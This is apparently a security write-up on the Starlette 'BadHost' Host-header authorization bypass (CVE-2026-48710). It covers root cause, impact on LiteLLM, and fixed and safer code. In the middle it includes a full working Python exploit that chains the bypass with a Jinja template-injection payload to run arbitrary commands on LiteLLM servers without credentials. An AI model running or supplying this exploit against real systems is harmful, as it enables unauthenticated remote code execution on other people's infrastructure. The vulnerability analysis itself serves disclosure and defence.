CVE-2026-48710: Starlette BadHost
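Background
In May this year, OSTIF disclosed a vulnerability in Starlette, nicknamed "BadHost" and tracked as CVE-2026-48710.
The real concern goes beyond Starlette itself. Starlette is one of the foundations of the Python ASGI ecosystem, and many higher-level applications depend on it. A typical example is FastAPI, which builds its request parsing, route dispatch, and middleware mechanism on Starlette. Any framework or product that depends on an affected Starlette version may therefore be exposed to an authorization bypass.
This propagation chain is especially visible in AI infrastructure. Over the past two years many LLM services have been built on Starlette, and popular projects such as LiteLLM, vLLM, and FastMCP are all affected by this vulnerability.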
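How the vulnerability works
BadHost has three trigger conditions:
- The underlying framework (Starlette) uses the Host header to rebuild the URL
- The path of the rebuilt URL differs from the path in the ASGI scope
- Downstream code trusts request.url.path and uses it for authorization checks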
BaseHTTPMiddleware wraps the incoming request in a _CachedRequest and passes it to dispatch_func:

    class BaseHTTPMiddleware:
        def __init__(self, app: ASGIApp, dispatch: DispatchFunction | None = None) -> None:
            self.app = app
            self.dispatch_func = self.dispatch if dispatch is None else dispatch

        async def __call__(self, scope: Scope, receive: Receive, send: Send) -> None:
            if scope["type"] != "http":
                await self.app(scope, receive, send)
                return

            request = _CachedRequest(scope, receive)
            ...
            response = await self.dispatch_func(request, call_next)

The Request that an auth middleware later receives is therefore a _CachedRequest, and request.url is a lazily evaluated property:
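
    @property
    def url(self) -> URL:
        if not hasattr(self, "_url"):  # pragma: no branch
            self._url = URL(scope=self.scope)
        return self._url

When URL is initialized from a scope, it takes the real path from the scope, reads the Host header from the headers, and concatenates the two into the full URL: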

    class URL:
        def __init__(
            self,
            url: str = "",
            scope: Scope | None = None,
            **components: Any,
        ) -> None:
            if scope is not None:
                assert not url, 'Cannot set both "url" and "scope".'
                assert not components, 'Cannot set both "scope" and "**components".'
                scheme = scope.get("scheme", "http")
                server = scope.get("server", None)
                path = scope["path"]
                query_string = scope.get("query_string", b"")

                host_header = None
                for key, value in scope["headers"]:
                    if key == b"host":
                        host_header = value.decode("latin-1")
                        break

                if host_header is not None:
                    url = f"{scheme}://{host_header}{path}"
                elif server is None:
                    url = path
                else:
                    host, port = server
                    default_port = {"http": 80, "https": 443, "ws": 80, "wss": 443}[scheme]
                    if port == default_port:
                        url = f"{scheme}://{host}{path}"
                    else:
                        url = f"{scheme}://{host}:{port}{path}"

                if query_string:
                    url += "?" + query_string.decode()
            elif components:
                assert not url, 'Cannot set both "url" and "**components".'
                url = URL("").replace(**components).components.geturl()

            self._url = url

The Host header is interpolated here without any check that it conforms to the RFC, and every request.url.* accessor that follows depends on self.components:

    @property
    def scheme(self) -> str:
        return self.components.scheme

    @property
    def netloc(self) -> str:
        return self.components.netloc

    @property
    def path(self) -> str:
        return self.components.path

    @property
    def query(self) -> str:
        return self.components.query

self.components is the URL string re-parsed with urlsplit:

    @property
    def components(self) -> SplitResult:
        if not hasattr(self, "_components"):
            self._components = urlsplit(self._url)
        return self._components

This means that if an attacker sets Host to x/?, the final self._url is assembled as:

    <scheme>://x/?<path>

Meanwhile, route dispatch does not use request.url.path. It uses the untainted scope["path"]:

    def matches(self, scope: Scope) -> tuple[Match, Scope]:
        path_params: dict[str, Any]
        if scope["type"] == "http":
            route_path = get_route_path(scope)
            match = self.path_regex.match(route_path)
            if match:
                matched_params = match.groupdict()
                for key, value in matched_params.items():
                    matched_params[key] = self.param_convertors[key].convert(value)
                path_params = dict(scope.get("path_params", {}))
                path_params.update(matched_params)
                child_scope = {"endpoint": self.endpoint, "path_params": path_params}
                if self.methods and scope["method"] not in self.methods:
                    return Match.PARTIAL, child_scope
                else:
                    return Match.FULL, child_scope
        return Match.NONE, {}

    def get_route_path(scope: Scope) -> str:
        path: str = scope["path"]
        root_path = scope.get("root_path", "")
        if not root_path:
            return path

        if not path.startswith(root_path):
            return path

        if path == root_path:
            return ""

        if path[len(root_path)] == "/":
            return path[len(root_path) :]

        return path

At this point the backend sees request.url.path as /, because urlsplit treats everything after the ? as the query string, while the scope still holds the real <path>. This is the mismatch.
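The mismatch can be reproduced with the standard library alone. The sketch below is a simplified stand-in for the interpolation step in URL.__init__ (it ignores the query string and the server fallback); rebuild_url and the /admin/users route are illustrative names, not part of Starlette.

```python
from urllib.parse import urlsplit


def rebuild_url(scheme: str, host_header: str, path: str) -> str:
    """Mimic the f-string interpolation shown above (simplified stand-in)."""
    return f"{scheme}://{host_header}{path}"


scope_path = "/admin/users"  # hypothetical protected route, as seen by the router

normal = urlsplit(rebuild_url("http", "example.com", scope_path))
forged = urlsplit(rebuild_url("http", "x/?", scope_path))

print(normal.path)    # /admin/users
print(forged.netloc)  # x
print(forged.path)    # /
print(forged.query)   # /admin/users
```

With the forged Host, the real path ends up in the query component, so any check on the parsed path sees only /.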
An example of a vulnerable auth middleware:

    from starlette.middleware.base import BaseHTTPMiddleware
    from starlette.responses import JSONResponse

    class VulnerableAuthMiddleware(BaseHTTPMiddleware):
        async def dispatch(self, request, call_next):
            path = request.url.path  # evaluates to "/" under a malformed Host

            if path.startswith("/admin"):  # never true, so the check is bypassed
                token = request.headers.get("authorization")

                if token != "Bearer secret-token":
                    return JSONResponse(
                        {"detail": "Unauthorized"},
                        status_code=401,
                    )

            # Falls straight through to the real business logic
            return await call_next(request)

Real-world case: LiteLLM
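LiteLLM Proxy is a typical AI gateway. It uses FastAPI to expose OpenAI-style APIs, and at the request entry point it checks virtual keys, user roles, allowed routes, budgets, model permissions, and so on.
In affected versions, LiteLLM's auth logic does not read the ASGI scope["path"] directly. It wraps the lookup in a helper, get_request_route(). Taking v1.83.14-stable as an example, the core of the function is: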

    def get_request_route(request: Request) -> str:
        try:
            if hasattr(request, "base_url") and request.url.path.startswith(
                request.base_url.path
            ):
                return request.url.path[len(request.base_url.path) - 1 :]
            else:
                return request.url.path
        except Exception:
            return request.url.path

In other words, LiteLLM's central auth path depends on request.url.path, which directly affects its route-based authorization. In user_api_key_auth, LiteLLM first computes:

    route: str = get_request_route(request=request)

It then uses this route to decide whether the request targets a public route:

    if (
        route in LiteLLMRoutes.public_routes.value
        or route_in_additonal_public_routes(current_route=route)
    ):
        return UserAPIKeyAuth(user_role=LitellmUserRoles.INTERNAL_USER_VIEW_ONLY)

The route / happens to be in LiteLLM's public_routes, so the attack chain becomes:
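- The attacker requests a backend endpoint such as /prompts/test
- A malformed Host header makes request.url.path parse as /
- LiteLLM's auth layer concludes that the request targets a public route and hands it to the downstream handler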
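The route resolution in this chain can be traced offline without Starlette or LiteLLM. The sketch below makes several assumptions: url_path and legacy_route are stand-ins written for illustration, base_url is assumed to be rebuilt through the same Host interpolation with path "/" (no root_path configured), and PUBLIC_ROUTES contains only the / entry mentioned above.

```python
from urllib.parse import urlsplit

PUBLIC_ROUTES = {"/"}  # assumption: only the entry the text mentions


def url_path(host_header: str, scope_path: str, scheme: str = "http") -> str:
    """Stand-in for request.url.path: interpolate Host, then re-parse."""
    return urlsplit(f"{scheme}://{host_header}{scope_path}").path


def legacy_route(host_header: str, scope_path: str) -> str:
    """Stand-in for the pre-fix get_request_route(), with no root_path set."""
    path = url_path(host_header, scope_path)
    base_path = url_path(host_header, "/")  # assumed: base_url is rebuilt the same way
    if path.startswith(base_path):
        return path[len(base_path) - 1:]
    return path


for host in ("example.com", "x/?"):
    route = legacy_route(host, "/prompts/test")
    print(repr(host), "->", repr(route), "public:", route in PUBLIC_ROUTES)
```

With a well-formed Host the resolved route is /prompts/test and the public-route test fails as intended. With the malformed Host the route collapses to /, which passes the test even though the router still dispatches on the original scope path.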
Chaining the BadHost authorization bypass with a previously disclosed backend sink yields unauthenticated remote code execution.
import argparseimport jsonimport socketimport sslimport sysfrom base64 import b64decodefrom typing import Optional, Tuplefrom urllib.parse import urlparse
class Logger: COLORS = {'DEBUG': '\033[36m', 'INFO': '\033[32m', 'ERROR': '\033[31m', 'FATAL': '\033[35m'}
def __init__(self, verbose=False): self.verbose = verbose
def _log(self, level, msg): print(f"{self.COLORS.get(level, '')}[{level.lower()}]\033[0m {msg}")
def debug(self, msg): if self.verbose: self._log('DEBUG', msg)
def info(self, msg): self._log('INFO', msg)
def error(self, msg): self._log('ERROR', msg)
def fatal(self, msg): self._log('FATAL', msg) sys.exit(1)
class LiteLLMBadHostExploit: BADHOST = "x/?"
def __init__(self, target, command, proxy=None, verbose=False): self.target = target.rstrip('/') self.command = command self.logger = Logger(verbose=verbose)
parsed = urlparse(self.target) self.host = parsed.hostname self.port = parsed.port or (443 if parsed.scheme == 'https' else 80) self.use_tls = parsed.scheme == 'https' self.proxy = urlparse(proxy) if proxy else None
def run(self): self.logger.info(f"Target: {self.target}") self.logger.info(f"Command: {self.command}")
result = self._execute_command(self.command) if result is None: self.logger.fatal("Command execution failed")
self.logger.info("Output:") print('\t' + result.replace('\n', '\n\t'))
def _execute_command(self, command: str) -> Optional[str]: payload = ( "---\nmodel: gpt-4o\n---\n\nUser: " "{% for c in ().__class__.__bases__[0].__subclasses__() %}" "{% if c.__name__ == \"catch_warnings\" %}" "{% set result = c.__init__.__globals__[\"sys\"].modules[\"os\"]" ".popen(\"" + command + "| base64 -w0\").read() %}" "{{ c.__init__.__globals__[\"__builtins__\"][\"exec\"](" "\"raise Exception('\" + result + \"')\") }}" "{% endif %}{% endfor %}" )
json_body = '{"dotprompt_content": "' + _to_unicode(payload) + '"}' self.logger.debug(f"Payload size: {len(json_body)} bytes")
status, body = self._raw_request('POST', '/prompts/test', json_body) self.logger.debug(f"Response: {status}")
if not body: return None
try: detail = json.loads(body).get('detail', '') if not detail: self.logger.debug(f"Response body: {body[:200]}") return None return b64decode(detail.encode()).decode() except Exception as e: self.logger.debug(f"Decode error: {e}, raw: {body[:200]}") return None
def _raw_request(self, method: str, path: str, body: str) -> Tuple[Optional[str], str]: try: sock = self._connect()
if self.use_tls: ctx = ssl.create_default_context() ctx.check_hostname = False ctx.verify_mode = ssl.CERT_NONE sock = ctx.wrap_socket(sock, server_hostname=self.host)
raw = ( f"{method} {path} HTTP/1.1\r\n" f"Host: {self.BADHOST}\r\n" f"Content-Type: application/json\r\n" f"Content-Length: {len(body.encode())}\r\n" f"Connection: close\r\n" f"\r\n" f"{body}" )
self.logger.debug(f">>> {method} {path}") sock.sendall(raw.encode())
response = b'' while True: try: chunk = sock.recv(8192) if not chunk: break response += chunk except socket.timeout: break
sock.close() text = response.decode(errors='replace') status_line = text.split('\r\n')[0] if text else None body_start = text.find('\r\n\r\n') resp_body = text[body_start + 4:] if body_start > 0 else '' return status_line, resp_body
except (socket.error, OSError) as e: self.logger.error(f"Connection failed: {e}") return None, ''
def _connect(self) -> socket.socket: if self.proxy and self.use_tls: sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM) sock.settimeout(15) sock.connect((self.proxy.hostname, self.proxy.port or 8080)) connect = f"CONNECT {self.host}:{self.port} HTTP/1.1\r\nHost: {self.host}:{self.port}\r\n\r\n" sock.sendall(connect.encode()) resp = sock.recv(4096).decode() if '200' not in resp: raise ConnectionError(f"Proxy CONNECT failed: {resp.strip()}") return sock
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM) sock.settimeout(15) sock.connect((self.host, self.port)) return sock
def _to_unicode(s: str) -> str: return ''.join(f'\\u{ord(c):04x}' for c in s)
if __name__ == '__main__': parser = argparse.ArgumentParser( description='LiteLLM BadHost RCE (CVE-2026-48710 + SSTI)', epilog='Example: python exploit_badhost.py -t http://target:4000 -c "id"' ) parser.add_argument('-t', '--target', required=True) parser.add_argument('-c', '--command', required=True) parser.add_argument('--proxy', default=None) parser.add_argument('-v', '--verbose', action='store_true') args = parser.parse_args()
print("\033[31m[*] LiteLLM BadHost RCE \u2014 CVE-2026-48710 + SSTI\033[0m") print("\033[31m[*] No credentials required\033[0m\n")
LiteLLMBadHostExploit( target=args.target, command=args.command, proxy=args.proxy, verbose=args.verbose, ).run()

In newer versions, LiteLLM changed get_request_route() to read request.scope["path"] first, and explicitly bumped its Starlette dependency version:

    def get_request_route(request: Request) -> str:
        """
        Resolve the request route from the ASGI scope, with ``root_path`` stripped.

        Prefer this over ``request.url.path`` for any auth, ACL, routing, or
        audit-log decision: Starlette reconstructs ``url.path`` by interpolating
        the Host header into a URL string and re-parsing with ``urlsplit``, so a
        malformed Host (e.g. ``localhost/?x=1``) collapses ``url.path`` to ``"/"``
        while FastAPI continues to dispatch on ``scope["path"]``.
        ``scope["path"]`` is uvicorn's parse of the HTTP request line and matches
        the actual handler, so it's the authoritative route.

        Also normalizes sub-path deployments by stripping ``scope["root_path"]``
        e.g. ``/genai/chat/completions`` -> ``/chat/completions``.
        """
        try:
            scope = request.scope
            if not isinstance(scope, dict):
                return str(request.url.path)
            raw_path: str = str(scope.get("path", request.url.path))
            root_path: str = str(
                scope.get("app_root_path", scope.get("root_path", ""))
            ).rstrip("/")
            if not isinstance(raw_path, str):
                return str(request.url.path)
            # Strip root_path only when it matches whole path segments, guarding
            # against sibling paths like "/apifoo" being truncated under
            # root_path="/api". Trailing slashes on root_path are stripped above,
            # so bare "/" or "/prefix/" still leave the leading "/" intact.
            if root_path and (
                raw_path == root_path or raw_path.startswith(root_path + "/")
            ):
                stripped = raw_path[len(root_path) :]
                return stripped or "/"
            return raw_path
        except Exception as e:
            verbose_proxy_logger.debug(
                f"error on get_request_route: {str(e)}, defaulting to request.url.path={request.url.path}"
            )
            return str(request.url.path)
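The same idea applies to custom auth middleware: decide on scope["path"], which is what the router dispatches on, instead of the reconstructed URL. The following is a minimal sketch written as a pure ASGI middleware so it runs without Starlette installed. ScopePathAuthMiddleware, downstream, status_for, the /admin prefix, and the token value are all hypothetical names chosen for illustration, not LiteLLM or Starlette code.

```python
import asyncio
import hmac
import json


class ScopePathAuthMiddleware:
    """Hypothetical pure-ASGI guard that authorizes on scope["path"]."""

    def __init__(self, app, token: str, protected_prefix: str = "/admin"):
        self.app = app
        self.expected = f"Bearer {token}".encode("latin-1")
        self.protected_prefix = protected_prefix

    async def __call__(self, scope, receive, send):
        if scope["type"] == "http" and scope["path"].startswith(self.protected_prefix):
            headers = dict(scope["headers"])  # ASGI header names are lowercase bytes
            supplied = headers.get(b"authorization", b"")
            if not hmac.compare_digest(supplied, self.expected):
                body = json.dumps({"detail": "Unauthorized"}).encode()
                await send({
                    "type": "http.response.start",
                    "status": 401,
                    "headers": [
                        (b"content-type", b"application/json"),
                        (b"content-length", str(len(body)).encode()),
                    ],
                })
                await send({"type": "http.response.body", "body": body})
                return
        await self.app(scope, receive, send)


async def downstream(scope, receive, send):
    """Stand-in for the real application."""
    await send({"type": "http.response.start", "status": 200, "headers": []})
    await send({"type": "http.response.body", "body": b"ok"})


def status_for(path: str, headers: list) -> int:
    """Drive the middleware once with a hand-built scope and return the status code."""
    sent = []

    async def receive():
        return {"type": "http.request", "body": b"", "more_body": False}

    async def send(message):
        sent.append(message)

    scope = {"type": "http", "method": "GET", "path": path, "headers": headers}
    app = ScopePathAuthMiddleware(downstream, token="secret-token")
    asyncio.run(app(scope, receive, send))
    return sent[0]["status"]


# A malformed Host no longer changes the outcome, because Host is never consulted.
print(status_for("/admin/users", [(b"host", b"x/?")]))
print(status_for("/admin/users", [(b"host", b"x/?"),
                                  (b"authorization", b"Bearer secret-token")]))
```

The first call is rejected with 401 and the second passes through with 200. This sketch only addresses the path check. Upgrading Starlette and rejecting malformed Host headers at the edge remain separate measures.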